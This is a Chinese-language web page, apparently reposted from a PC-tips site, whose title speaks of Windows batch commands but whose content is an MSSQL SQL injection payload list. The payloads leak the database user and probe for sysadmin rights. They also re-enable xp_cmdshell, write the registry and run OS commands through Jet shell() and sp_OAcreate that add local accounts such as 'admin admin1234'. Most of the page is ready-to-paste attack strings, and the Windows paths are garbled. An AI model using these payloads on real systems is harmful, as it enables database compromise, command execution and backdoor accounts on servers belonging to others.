cmd替换字符串 常用的批处理命令|Windows中的批处理的常用符号介绍(9)

//检测是否有读取某的权限

and 1= (Select HAS_DBACCESS('master'))

And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型

and char(124)%2Buser%2Bchar(124)=0

字符类型

' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型

' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名

and user>0

' and user>0 and ''='

检测是否为SA权限

and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL

and exists (select * from sysobjects);--

检测是否支持多行

;declare @d int;--

恢复 xp_cmdshell

;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------

// 执行命令

//-----------------------

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:1111'

判断xp_cmdshell扩展存储过程是否存在：

?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-79894-9.html